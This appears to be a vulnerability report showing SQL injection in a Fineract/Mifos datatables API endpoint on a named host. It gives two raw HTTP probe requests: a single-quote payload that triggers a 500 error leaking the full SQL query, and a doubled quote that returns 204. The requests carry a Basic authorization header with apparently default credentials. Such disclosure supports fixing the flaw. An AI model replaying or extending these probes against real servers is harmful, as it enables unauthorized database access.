SQL Injection at /fineract-provider/api/v1/datatables/dfgh

The URL path filename appears to be vulnerable to SQL injection attacks.

Request 1:

GET /fineract-provider/api/v1/datatables/dfgh' HTTP/1.1
Host: dev.mifos.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Fineract-Platform-Tenantid: default
Authorization: Basic bWlmb3M6cGFzc3dvcmQ=
Dnt: 1
Referer: <https://dev.mifos.io/>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Response 1:

HTTP/1.1 500 
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 10 Jul 2023 11:09:49 GMT
Content-Type: application/json
Connection: close
Content-Length: 1487

{"timestamp":1688987389064,"status":500,"error":"Internal Server Error","message":"StatementCallback; bad SQL grammar [select application_table_name, registered_table_name from x_registered_table  where exists (select 'f' from m_appuser_role ur  join m_role r on r.id = ur.role_id left join m_role_permission rp on rp.role_id = r.id left join m_permission p on p.id = rp.permission_id where ur.appuser_id = 1 and registered_table_name='dfgh'' and (p.code in ('ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_table_name)))  order by application_table_name, registered_table_name]; nested exception is java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_tab' at line 1\\n\\nQuery being executed when exception was thrown:\\nselect application_table_name, registered_table_name from x_registered_table  where exists (select 'f' from m_appuser_role ur  join m_role r on r.id = ur.role_id left join m_role_permission rp on rp.role_id = r.id left join m_permission p on p.id = rp.permission_id where ur.appuser_id = 1 and registered_table_name='dfgh'' and (p.code in ('ALL_FUNCTIONS', 'ALL_FUNCTIONS_READ') or p.code = concat('READ_', registered_table_name)))  order by application_table_name, registered_table_name\\n\\n","path":"/fineract-provider/api/v1/datatables/dfgh'"}

Request 2:

GET /fineract-provider/api/v1/datatables/dfgh'' HTTP/1.1
Host: dev.mifos.io
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Fineract-Platform-Tenantid: default
Authorization: Basic bWlmb3M6cGFzc3dvcmQ=
Dnt: 1
Referer: <https://dev.mifos.io/>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

Response 2:

HTTP/1.1 204 
Server: nginx/1.4.6 (Ubuntu)
Date: Mon, 10 Jul 2023 11:09:56 GMT
Connection: close
X-Notification-Refresh: false
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
X-Content-Type-Options: nosniff

Untitled